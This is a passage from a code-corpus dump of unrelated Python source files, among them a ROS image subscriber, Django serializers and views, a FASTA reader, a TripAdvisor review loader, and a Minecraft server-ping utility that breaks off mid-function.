self.pair_classifier(pair_text.float()), self.pair_sentiment_classifier(pair_text.float())\n pair_probs = pair_probs_.contiguous().view(-1, 3)\n pair_sentiment_probs = pair_sentiment_probs_.contiguous().view(-1, 4)\n\n return aspect_probs, opinion_probs, pair_probs, pair_sentiment_probs","sub_path":"bert_models/bert_init.py","file_name":"bert_init.py","file_ext":"py","file_size_in_byte":12745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"162102632","text":"import message_filters\nfrom std_msgs.msg import Int32, Float32\nimport rospy\nfrom sensor_msgs.msg import CompressedImage\nfrom sensor_msgs.msg import LaserScan\nimport cv2\nfrom cv_bridge import CvBridge, CvBridgeError\nimport numpy as np\n\n#define the list of boundaries\nboundaries = [\n\t([17, 15, 100], [50, 56, 200]),\n\t([86, 31, 4], [220, 88, 50]),\n\t([25, 146, 190], [62, 174, 250]),\n\t([103, 86, 65], [145, 133, 128])\n]\n\nlowerRedBoundary = np.array([17, 15, 100], dtype = 
\"uint8\")\nupperRedBoundary = np.array([50, 56, 200], dtype = \"uint8\")\n\ndef callback(distance, image):\n print(distance.ranges[0])\n bridge = CvBridge()\n try:\n cv_image = bridge.compressed_imgmsg_to_cv2(image)\n except CvBridgeError as e:\n print(e)\n\n hsv_frame = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)\n # Red color\n low_red = np.array([161, 155, 84])\n high_red = np.array([179, 255, 255])\n red_mask = cv2.inRange(hsv_frame, low_red, high_red)\n hsv_red_output = cv2.bitwise_and(cv_image, cv_image, mask=red_mask)\n\n cv2.imshow(\"Image window hsv\", hsv_red_output)\n\n mask = cv2.inRange(cv_image, lowerRedBoundary, upperRedBoundary)\n output = cv2.bitwise_and(cv_image, cv_image, mask = mask)\n\n cv2.imshow(\"Image window1\", cv_image)\n cv2.imshow(\"Image window\", output)\n cv2.waitKey(1)\n \n\ndef twotopic_sub():\n rospy.init_node('2topicsub', anonymous=True)\n mode_sub = message_filters.Subscriber('scan', LaserScan)\n penalty_sub = message_filters.Subscriber('/camera/image/compressed', CompressedImage)\n\n ts = message_filters.ApproximateTimeSynchronizer([mode_sub, penalty_sub], 10, 0.1, allow_headerless=True)\n ts.registerCallback(callback)\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n twotopic_sub()\n except rospy.ROSInterruptException:\n pass","sub_path":"scripts/2topics_subscriber.py","file_name":"2topics_subscriber.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"84070018","text":"from rest_framework import serializers\r\nfrom ..p_models.color_model import ColorModel\r\n\r\nclass ColorSerilizer(serializers.ModelSerializer):\r\n class Meta:\r\n model = ColorModel\r\n fields = ('id', 'color', 'code')\r\n \r\n def validate(self, data):\r\n if data.get('color'):\r\n data['code'] = data.get('color', '').replace(\" \", \"_\").upper()\r\n else:\r\n raise serializers.ValidationError(\"Color is required\")\r\n return data\r\n\r\n def create(self, 
validated_data): \r\n ## Role data \r\n color = ColorModel.objects.create(**validated_data)\r\n return color\r\n\r\n def update(self, instance, validated_data):\r\n # Update the Foo instance\r\n instance.color = validated_data.get('color', instance.color) \r\n instance.code = validated_data.get('code', instance.code) \r\n instance.save() \r\n return instance","sub_path":"products/p_serializers/color_serializers.py","file_name":"color_serializers.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"347312355","text":"from networktables import NetworkTablesInstance\nfrom networktables import NetworkTables\n\ndef publishNumber(MergeVisionPipeLineTableName, name, value):\n #start NetworkTables\n ntinst = NetworkTablesInstance.getDefault()\n # Name of network table - this is how it communicates with robot. IMPORTANT\n networkTable = NetworkTables.getTable(MergeVisionPipeLineTableName)\n networkTable.putNumber(name, value)\n #print(name+ \": \" + str(value))\n\ndef publishString(NetworkTableName,name, Strvalue):\n #start NetworkTables\n ntinst = NetworkTablesInstance.getDefault()\n # Name of network table - this is how it communicates with robot. 
IMPORTANT\n networkTable = NetworkTables.getTable(NetworkTableName)\n networkTable.putString(name, Strvalue)\n #print(name+ \": \" + str(value)) ","sub_path":"NetworkTablePublisher.py","file_name":"NetworkTablePublisher.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"117628409","text":"import sqlite3\n\ndbname = \"test.db\"\n\n\ndef createTables():\n \"\"\"\n 读取tableList,自动为数据库建表\n \"\"\"\n with sqlite3.connect(dbname) as conn:\n with open(\"tableList.txt\", \"r\", encoding=\"utf-8\") as ftable:\n for baseName in ftable:\n # 拼接表名\n tableName = baseName.replace(\"\\n\", \"\")\n with open(tableName+\".sql\", \"r\", encoding=\"utf-8\") as fsql:\n sql = fsql.read()\n conn.execute(sql)\n\n\nif __name__ == \"__main__\":\n createTables()\n print(\"---end---\")\n","sub_path":"PythonDemo/Day08/02initdb.py","file_name":"02initdb.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"37261307","text":"from collections import Counter\n\n\"\"\"\ninput: \n10\n2 3 4 5 6 8 7 6 5 18\n6\n6 55\n6 45\n6 55\n4 40\n18 60\n10 50\n\"\"\"\nif __name__ == \"__main__\":\n _ = input()\n count = Counter(list(map(int, input().split())))\n no_of_customers = int(input())\n res = 0\n for _ in range(no_of_customers):\n line = list(map(int, input().split()))\n if count[line[0]] != 0:\n res += line[1]\n count[line[0]] -= 1\n print(res)\n","sub_path":"collections_counter().py","file_name":"collections_counter().py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"546238544","text":"from setuptools import find_packages\nfrom setuptools import setup\n\nPYTEST_VERSION_ = '3.3.0'\n\nsetup(name='audiomate',\n version='2.0.0',\n description='Audiomate is a library for working with audio datasets.',\n 
long_description='Audiomate is a library for easy access to audio datasets. '\n 'It provides the datastructures for accessing/loading different datasets in a generic way. '\n 'This should ease the use of audio datasets for example for machine learning tasks.',\n url='https://github.com/ynop/audiomate',\n download_url='https://github.com/ynop/audiomate/releases',\n author='Matthias Buechi, Andreas Ahlenstorf',\n author_email='buec@zhaw.ch',\n classifiers=[\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3 :: Only',\n 'Topic :: Scientific/Engineering :: Human Machine Interfaces'\n ],\n keywords='audio music sound corpus dataset',\n license='MIT',\n packages=find_packages(exclude=['tests']),\n install_requires=[\n 'audioread >= 2.1.0',\n 'numpy >= 1.14.0',\n 'scipy >= 1.1.0',\n 'librosa >= 0.6.0',\n 'h5py >= 2.7.1',\n 'networkx >= 2.0',\n 'beautifulsoup4 >= 4.6.0',\n 'lxml >= 4.1.1',\n 'requests >= 2.18.4'\n ],\n include_package_data=True,\n zip_safe=False,\n test_suite='tests',\n extras_require={\n 'dev': [\n 'click==6.7',\n 'pytest==%s' % (PYTEST_VERSION_,),\n 'pytest-runner==3.0',\n 'pytest-cov==2.5.1',\n 'requests_mock==1.4.0',\n 'Sphinx==1.6.5',\n 'sphinx-rtd-theme==0.2.5b1'\n ],\n 'ci': ['flake8==3.5.0', 'flake8-quotes==0.12.1'],\n },\n setup_requires=['pytest-runner'],\n tests_require=[\n 'pytest==%s' % (PYTEST_VERSION_,),\n 'requests_mock==1.4.0'\n ],\n entry_points={\n }\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"262346634","text":"\"\"\"\n给定一个整数数组 nums,其中恰好有两个元素只出现一次,其余所有元素均出现两次。\n找出只出现一次的那两个元素。你可以按 任意顺序 返回答案。\n\"\"\"\n\n\ndef singleNumber2(nums):\n e1 = 0\n e2 = 0\n\n for e in nums:\n e1 ^= e\n\n rightOne = e1 & (~e1 + 1)\n\n for e in nums:\n if e & rightOne != 0:\n e2 ^= e\n\n return [e2, e1 ^ 
e2]","sub_path":"BitOperation/singleNum2.py","file_name":"singleNum2.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"528110114","text":"from typing import Tuple\n\nfrom gol.models import Task\nfrom gol.common import Grid, Reporter\nfrom gol.rules_parser import parse\nfrom .common import Ok, Score, Rules, tick, validate_grid_colors, \\\n validate_grid_size\n\n\ndef _red_top_count(grid: Grid):\n return grid[0].count('r')\n\n\n@validate_grid_colors\n@validate_grid_size\ndef eval_line_coloring(task: Task, rules: Rules, grid: Grid,\n int_reporter: Reporter,\n user_reporter: Reporter) -> Tuple[Ok, Score]:\n rules = parse(task.rules, task.allowed_colors)\n\n for y in range(grid.height-1):\n for x in range(grid.width):\n if grid[y][x] != 'b':\n user_reporter('[ERR] Obarvili jste víc, než jen spodní řádek!')\n return (False, 0)\n\n for i in range(11):\n grid = tick(grid, rules, task.global_config())\n int_reporter(f'[OK] Po {i+1}. krocích v horním řádku '\n f'{_red_top_count(grid)} červených buňek.')\n\n score = _red_top_count(grid)\n user_reporter(f'[OK] Počet červených buňek v horním řádku po 11. 
kroku:'\n f' {score}.')\n return (True, score)\n","sub_path":"gol/evaluators/line_coloring.py","file_name":"line_coloring.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"459934642","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 28 16:51:33 2018\r\n\r\n@author: zdenek\r\n\"\"\"\r\n\r\ndef remap_values(all_possible_values, old_positions):\r\n old_map = all_possible_values\r\n old_map_unique = np.unique(old_map) \r\n new_map_unique = np.arange(len(old_map_unique))\r\n \r\n new_positions = []\r\n for p in old_positions:\r\n new_positions.append(new_map_unique[ np.where(old_map_unique == p )][0])\r\n return old_map_unique, new_map_unique, new_positions \r\n\r\n\r\n\r\nplt.ioff()\r\nprint('\\nGenerating p_diff graphs')\r\nos.makedirs( '{}/{}/{}'.format(cwd, results_dir, p_diff_graphs), exist_ok=True)\r\n\r\nsamples = sorted([ a for a in result_frame['sample'].unique() ])\r\nfor sample in samples:\r\n next_frame = result_frame[result_frame['sample'] == sample]\r\n pressures = sorted([ a for a in next_frame['pressure'].unique() ])\r\n for pressure in pressures:\r\n next_frame2 = next_frame[next_frame['pressure'] == pressure] \r\n voltages = sorted([ a for a in next_frame2['voltage'].unique()])\r\n for voltage in voltages: \r\n last_frame = next_frame2[next_frame2['voltage'] == voltage]\r\n \r\n p_diff_color_map.reset() \r\n plt.figure()\r\n last_frame = last_frame.sort_values(by='temperature') \r\n\r\n xt = np.arange(len(last_frame.temperature.unique()))\r\n\r\n\r\n\r\n all_possible_x_values = np.array(last_frame.temperature.tolist()+ [-8,-5,0,10,22,40]) \r\n \r\n old_map_unique, new_map_unique, new_X_positions = remap_values(all_possible_x_values, last_frame.temperature)\r\n\r\n \r\n\r\n\r\n plt.plot(new_X_positions, last_frame.pDiff, color= p_diff_color_map.get_color(False), lw = 1, marker = 'o', label = '')\r\n fplot.add_label('p_diff', 
p_diff_color_map.get_color(True), marker = 'o' ) \r\n \r\n for msp, msp_cor, msp_cor_new, temp, pDiff in zip(last_frame.valid_MSP_rate, last_frame.valid_msp_rate_cor,last_frame.valid_msp_rate_cor2, new_X_positions, last_frame.pDiff ):\r\n print(msp, msp_cor, msp_cor_new, temp, pDiff)\r\n plt.annotate(\"{} \\n {} \\n {}\".format(msp, msp_cor, msp_cor_new), [temp, pDiff], fontsize = 16, fontweight='bold', color='red')\r\n\r\n plt.plot(new_X_positions, last_frame.pDiff_BMP, color = p_diff_color_map.get_color(False), lw = 1, marker = 'o', label = '')\r\n fplot.add_label('p_BMP', p_diff_color_map.get_color(True), marker = 'o' ) \r\n \r\n plt.plot(new_X_positions, last_frame.pDiff_MSP, color = p_diff_color_map.get_color(False), lw = 1, marker = 'o', label = '')\r\n fplot.add_label('p_MSP', p_diff_color_map.get_color(True), marker = 'o' ) \r\n\r\n old_positions = [-8,-5,0,10,22,40]\r\n old_map_unique, new_map_unique, new_X_positions = remap_values(all_possible_x_values, [-8,-5,0,10,22,40])\r\n\r\n plt.plot(new_X_positions, [-700,-700,-700,-700,-500,-700], 'k', ls = '--')\r\n plt.plot(new_X_positions, [ 700, 700, 700, 700, 500, 700], 'k', ls = '--')\r\n \r\n fplot.set_plot_config('Temperature [°C]', 'Pressure [mbar]',' {}; {} bar; {} V'.format( sample, pressure/1000 ,voltage/1000), ylim = [-2000,None]) \r\n fplot.modify_ticks(list(map(str, old_map_unique)), new_map_unique, action = \"clear\", axes_type = 'x') \r\n plt.xlim(-0.3,len(new_map_unique)) \r\n plt.legend(loc = 'lower right') \r\n plt.savefig( '{}/{}/{}/{}_{}_bar_{}_V.png'.format( cwd, results_dir, p_diff_graphs, sample, pressure/1000, voltage/1000)) \r\n plt.close()\r\n","sub_path":"masked_pmm_temperatures.py","file_name":"masked_pmm_temperatures.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"375104250","text":"from __future__ import unicode_literals\n\nfrom django.core.urlresolvers import reverse\nfrom 
django.test import TestCase\n\n\nclass PageOpenTestCase(TestCase):\n def test_home_page_exists(self):\n url = reverse('home')\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n\n def test_about_page_exists(self):\n url = reverse('about')\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n","sub_path":"src/him_database/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"405302358","text":"# Version: 2020.02.21\n#\n# MIT License\n#\n# Copyright (c) 2018 Jiankang Deng and Jia Guo\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\n# pylint: disable=wildcard-import, unused-wildcard-import\n\"\"\"\nThis code file mainly comes from https://github.com/dmlc/gluon-cv/blob/master/gluoncv/model_zoo/model_zoo.py\n\"\"\"\nfrom .face_recognition import *\nfrom .face_detection import *\nfrom .face_genderage import *\n#from .face_alignment import *\n\n__all__ = ['get_model', 'get_model_list']\n\n_models = {\n 'arcface_r100_v1': arcface_r100_v1,\n #'arcface_mfn_v1': arcface_mfn_v1,\n #'arcface_outofreach_v1': arcface_outofreach_v1,\n 'retinaface_r50_v1': retinaface_r50_v1,\n 'retinaface_mnet025_v1': retinaface_mnet025_v1,\n 'retinaface_mnet025_v2': retinaface_mnet025_v2,\n 'genderage_v1': genderage_v1,\n}\n\n\ndef get_model(name, **kwargs):\n \"\"\"Returns a pre-defined model by name\n\n Parameters\n ----------\n name : str\n Name of the model.\n root : str, default '~/.insightface/models'\n Location for keeping the model parameters.\n\n Returns\n -------\n Model\n The model.\n \"\"\"\n name = name.lower()\n if name not in _models:\n err_str = '\"%s\" is not among the following model list:\\n\\t' % (name)\n err_str += '%s' % ('\\n\\t'.join(sorted(_models.keys())))\n raise ValueError(err_str)\n net = _models[name](**kwargs)\n return net\n\n\ndef get_model_list():\n \"\"\"Get the entire list of model names in model_zoo.\n\n Returns\n -------\n list of str\n Entire list of model names in model_zoo.\n\n \"\"\"\n return sorted(_models.keys())\n\n","sub_path":"embedding-calculator/srcext/insightface/python-package/insightface/model_zoo/model_zoo.py","file_name":"model_zoo.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"416909276","text":"__author__ = 'Carter'\nfrom django_mako_plus.controller import view_function\nfrom django import forms\nfrom django.http import HttpResponseRedirect\nimport CHF.models as cMod\nfrom django_mako_plus.controller.router import get_renderer\nfrom django.contrib.auth.decorators import permission_required\ntemplater = get_renderer('CHF')\n\n################################## INITIAL/CREATE FUNCTION #####################################\n\n@view_function\n@permission_required('CHF.manager_rights')\ndef process_request(request):\n params = {}\n\n params['products'] = cMod.Product.objects.all().order_by('name')\n params['listForm'] = EditForm()\n params['Product'] = ''\n\n if request.method == \"POST\":\n # UPDATE USER IF FORM IS VALID\n form = EditForm(request.POST)\n params['listForm'] = form\n product = cMod.Product()\n\n if form.is_valid():\n product.name = form.cleaned_data['name']\n product.description = form.cleaned_data['description']\n product.category = form.cleaned_data['category']\n product.currentPrice = form.cleaned_data['currentPrice']\n product.save()\n\n return HttpResponseRedirect('/CHF/ManageProducts')\n\n return templater.render_to_response(request, 'ManageProducts.html', params)\n\n\n################################## EDIT/ARCHIVE USER FUNCTION #####################################\n\n@view_function\ndef edit(request):\n params = {}\n\n try:\n product = cMod.Product.objects.get(id=request.urlparams[0])\n except cMod.Product.DoesNotExist:\n return HttpResponseRedirect('/CHF/ManageProducts')\n\n if request.method == 'POST':\n form = EditForm(request.POST)\n\n # DELETE PRODUCT IF ARCHIVE BUTTON WAS PRESSED\n if 'archiveButton' in request.POST:\n print(\"Archiving!\")\n product.delete()\n return HttpResponseRedirect('/CHF/ManageProducts/')\n\n # UPDATE USER IF FORM IS VALID\n if form.is_valid():\n product.name = form.cleaned_data['name']\n product.description = form.cleaned_data['description']\n product.category = 
form.cleaned_data['category']\n product.currentPrice = form.cleaned_data['currentPrice']\n product.save()\n\n else:\n form = EditForm(initial={\n 'name': product.name,\n 'description': product.description,\n 'currentPrice': product.currentPrice,\n 'category': product.category,\n })\n # Generate Form Data\n params['listForm'] = form\n params['Product'] = product\n\n\n # Get all user objects to populate list column\n params['products'] = cMod.Product.objects.all().order_by('name')\n\n return templater.render_to_response(request, 'ManageProducts.html', params)\n\n##################################### FORM CLASS ##############################################\n\nclass EditForm(forms.Form):\n name = forms.CharField(required=True, max_length=25)\n currentPrice = forms.CharField(required=True, max_length=25)\n category = forms.CharField(required=True, max_length=25)\n description = forms.CharField(widget=forms.Textarea)\n\n\n\n","sub_path":"CHF/CHF/views/ManageProducts.py","file_name":"ManageProducts.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"327324865","text":"from scipy.optimize import fsolve\n\nGAS_MOLAR_FRACTION = 'GAS_MOLAR_FRACTION' \nLIQUID_MOLAR_FRACTION = 'LIQUID_MOLAR_FRACTION'\n\nclass IdealBinaryMixtureFixedTemperature(object):\n '''\n '''\n def __init__(self, component_one, component_two, temperature):\n self.components = [component_one, component_two]\n self.saturation_pressures = [\n component_one.calculate_saturation_pressure(temperature),\n component_two.calculate_saturation_pressure(temperature)\n ]\n \n def calculate_saturation_pressure(\n self,\n component_one_molar_fraction,\n molar_fraction_type=GAS_MOLAR_FRACTION\n ): \n '''\n '''\n residual_function = None\n if molar_fraction_type == GAS_MOLAR_FRACTION:\n residual_function = (\n self._pressure_equation_residual_function_with_gas_molar_fraction)\n elif molar_fraction_type == 
LIQUID_MOLAR_FRACTION:\n residual_function = (\n self._pressure_equation_residual_function_with_liquid_molar_fraction)\n saturation_pressure = fsolve(\n func=residual_function,\n x0=self.saturation_pressures[0],\n args=(component_one_molar_fraction)\n )\n return saturation_pressure[0]\n \n def _pressure_equation_residual_function_with_gas_molar_fraction(\n self,\n pressure_guess,\n component_one_gas_molar_fraction,\n ): \n '''\n '''\n p = pressure_guess\n y_1 = component_one_gas_molar_fraction\n psat_1 = self.saturation_pressures[0]\n psat_2 = self.saturation_pressures[1]\n y_2 = 1.0 - y_1\n x_1 = y_1 * (p / psat_1)\n x_2 = 1.0 - x_1\n \n residual = y_1 * p + y_2 * p - x_1 * psat_1 - x_2 * psat_2 \n return residual\n \n def _pressure_equation_residual_function_with_liquid_molar_fraction(\n self,\n pressure_guess,\n component_one_liquid_molar_fraction,\n ): \n '''\n '''\n p = pressure_guess\n psat_1 = self.saturation_pressures[0]\n psat_2 = self.saturation_pressures[1]\n x_1 = component_one_liquid_molar_fraction\n x_2 = 1.0 - x_1\n y_1 = x_1 * (psat_1 / p)\n y_2 = 1.0 - y_1\n \n residual = y_1 * p + y_2 * p - x_1 * psat_1 - x_2 * psat_2 \n return residual","sub_path":"src/plu_diffusion/ideal_binay_mixture_fixed_temperature.py","file_name":"ideal_binay_mixture_fixed_temperature.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"321789842","text":"import json\nimport pandas as pd \nimport os \nimport sys\nimport re\nimport calendar\n\nfrom utils.loader_utils import read_jl_file, extract_details, get_resto_id, convert_date\nfrom utils.processing_utils import language_filter\n\nclass TADataLoader:\n '''\n Class used to load the data scraped from Trip Advisor using the spider \n contained in Deliverable 1. 
\n\n Parameters\n ----------\n data_file: str\n name of the file containing data\n data_path: str \n path to data_file\n\n Attributes\n ----------\n data_file: str\n name of the file containing data\n data_path: str \n path to data_file\n df_resto: pandas.DataFrame\n contains the restaurant information scrapped\n df_reviews: pandas.DataFrame\n contains the review information scrapped\n __dfs_built: Bool\n indicates if df_resto and df_reviews have been build\n __review_clean: Bool\n indicates if df_reviews has been cleaned\n __resto_clean: Bool\n indicates if df_resto has been cleaned\n\n '''\n def __init__(self, data_file='scrapped_data.jl', \n data_path='../Deliverable_1/TA_reviews/scrapped_data'):\n self.data_file = data_file\n self.data_path = data_path\n self.__dfs_built = False\n self.__review_clean = False\n self.__resto_clean = False\n\n def _build_df(self, ignore_duplicates=False):\n '''Builds data frames from .jl file and store them in class.'''\n data = read_jl_file(os.path.join(self.data_path,self.data_file))\n\n df = pd.DataFrame(data)\n df_restos = df[df['resto_url'].notnull()] # unique to resto\n df_reviews = df[df['review_url'].notnull()] # unique to review\n \n # check there are no duplicates\n if ignore_duplicates:\n pass\n else:\n if df_restos['resto_url'].duplicated().sum() > 0 :\n raise TypeError('Data has duplicated restaurants.')\n if df_reviews['review_url'].duplicated().sum() > 0:\n raise TypeError('Data has duplicated reviews.')\n\n df_reviews = language_filter(df_reviews, 'review_content')\n\n self.__dfs_built = True\n self.df_resto = df_restos.dropna(axis=1, how='all')\n self.df_review = df_reviews.dropna(axis=1, how='all')\n\n def _clean_review(self):\n '''Cleans self.df_reviews.'''\n # transform resto_name\n self.df_review['resto_name'] = self.df_review[\"resto_name\"].apply(\n lambda x: x[0]\n )\n # fix formatting of review likes\n self.df_review['review_likes'] = self.df_review['review_likes'].apply(\n lambda x: 0 if x is None else 
int(x.split(\" \")[0])\n )\n # fix formatting of user likes\n self.df_review['user_number_likes'] = (\n self.df_review['user_number_likes'].fillna(0).apply(int)\n )\n # fix formatting of user number reviews\n self.df_review['user_number_reviews'] = (\n self.df_review['user_number_reviews'].apply(int)\n )\n # fix ratings\n self.df_review['review_rating'] = (\n self.df_review['review_rating'].apply(lambda x: int(x[-2]))\n )\n # extract research ID\n self.df_review = get_resto_id(self.df_review, 'review')\n\n self.df_review['review_id'] = self.df_review['review_url'].apply(\n lambda x: re.findall(r'\\-r(\\d+)\\-', x)[0]\n )\n\n # convert review dates to datetime objects\n self.df_review = convert_date(self.df_review)\n\n # add review length\n self.df_review['review_length'] = self.df_review['review_content'].apply(\n lambda x: len(x)\n )\n\n # set bool to reflect operation was performed\n self.__review_clean = True\n\n def _clean_resto(self):\n '''Cleans self.df_resto.'''\n # transform resto_name\n self.df_resto['resto_name'] = self.df_resto['resto_name'].apply(\n lambda x: x[0]\n )\n # extract research ID\n self.df_resto = get_resto_id(self.df_resto, 'resto')\n\n # extract rating\n self.df_resto['resto_rating'] = self.df_resto['resto_rating'].apply(\n lambda rating: float(re.findall(r'([0-9]\\.[0-9])\\s', rating[0])[0])\n )\n # extract additional information\n self.df_resto = extract_details(self.df_resto)\n\n # set bool to reflect operation was performed\n self.__resto_clean = True\n \n def load_reviews(self, drop_duplicates=False):\n '''Returns data frame with review data.'''\n if not self.__dfs_built:\n if drop_duplicates:\n self._build_df(ignore_duplicates=True)\n else:\n self._build_df()\n \n if drop_duplicates:\n self.df_review.drop_duplicates(subset='review_url', inplace=True)\n\n if not self.__review_clean:\n self._clean_review()\n\n return self.df_review\n \n def load_restos(self, drop_duplicates=False):\n '''Returns data frame with restaurant data.'''\n if 
not self.__dfs_built:\n if drop_duplicates:\n self._build_df(ignore_duplicates=True)\n else:\n self._build_df()\n\n if drop_duplicates:\n self.df_resto.drop_duplicates(subset='resto_url', inplace=True)\n\n if not self.__resto_clean:\n self._clean_resto()\n\n return self.df_resto \n","sub_path":"Deliverable_2/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"317875569","text":"#!/usr/bin/env python\n\n\"\"\"\nParse a single FASTA record from stdin and print it.\n\"\"\"\n\nimport sys\n\nclass FASTAReader( object ):\n def __init__( self, file ):\n self.file = file\n self.last_id = None\n \n def next( self ):\n if self.last_id is None:\n line = self.file.readline()\n # Verify is header line\n assert line.startswith( \">\" )\n # Extract id -- whole line\n ## identifier = line[1:].rstrip( \"\\r\\n\" )\n # Extract id -- space\n identifier = line[1:].split()[0]\n else:\n identifier = self.last_id\n\n sequences = []\n\n while True:\n line = self.file.readline().rstrip(\"\\r\\n\")\n if line.startswith( \">\" ):\n self.last_id = line[1:].split()[0]\n break\n elif line == \"\":\n sequences.append( line )\n return False, identifier, \"\".join( sequences )\n else:\n sequences.append( line )\n \n return True, identifier, \"\".join( sequences )\n \n#print identifier, \"\".join(sequences)\n \n# what I want;\n\n#reader = FASTAReader(sys.stdin)\n \n#while 1:\n# identifier, sequence=reader.next()\n# if identifier is None:\n# break\n# print identifier, sequence\n \n","sub_path":"week1-homework/fasta.py","file_name":"fasta.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599713007","text":"'''\r\nCreated on Dec 25, 2015\r\n\r\n@author: KIT1HC\r\n'''\r\n\r\ntry:\r\n from setuptools import setup\r\nexcept ImportError:\r\n from distutils.core import 
setup\r\n \r\n\r\nconfig = {\r\n \"description\": \"System Test Utils contains util functions for system test\",\r\n \"author\": \"Thach Kieu\",\r\n \"author_email\": \"thach.kieubuu@vn.bosch.com\",\r\n \"version\": \"0.6.4\",\r\n \"install_requires\":[],\r\n \"packages\":['src'],\r\n \"name\": \"System Test Utils\"\r\n}\r\n\r\nsetup(**config)\r\n","sub_path":"com.etas.systemtest.utils/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"50693951","text":"import os\nimport socket\nimport dateutil.parser\nfrom dateutil.tz import *\nimport json\nfrom datetime import datetime, timedelta\nimport re\nimport socket\nfrom xml.sax.saxutils import escape\nfrom canary import config\n\n__all__ = ['filename', 'check']\n\nsafename = re.compile(r'[^a-zA-Z0-9\\-.]')\nsafeport = re.compile(r'[^0-9]')\nsafemotd = {'\"': '"',\n '\\'': '''}\n\nMAX_DOMAIN_LEN = 255\n\n\ndef get_info(host, port):\n \"\"\" Get information about a Minecraft server \"\"\"\n # inspired from\n # https://gist.github.com/1209061\n # http://www.wiki.vg/Protocol#Server_List_Ping_.280xFE.29\n # http://www.wiki.vg/Server_List_Ping\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(config['TIMEOUT'])\n s.connect((host, port))\n\n s.send('\\xfe\\x01')\n d = s.recv(256)\n s.close()\n assert d[0] == '\\xff'\n\n d = d[3:].decode('utf-16be')\n\n res = {'motd': '',\n 'players': -1,\n 'max_players': -1,\n 'protocol_version': -1,\n 'server_version': ''}\n\n if d[:3] == u'\\xa7\\x31\\x00':\n # new protocol (>= 1.4)\n\n d = d[3:].split(u'\\x00')\n\n dlen = len(d)\n\n if dlen > 0:\n res['protocol_version'] = int(d[0])\n if dlen > 1:\n res['server_version'] = d[1]\n if dlen > 2:\n res['motd'] = escape(d[2], safemotd)\n if dlen > 3:\n res['players'] = int(d[3])\n if dlen > 4:\n res['max_players'] = int(d[4])\n\n else:\n # old protocol (< 1.4)\n # note some servers (modded bukkit?) 
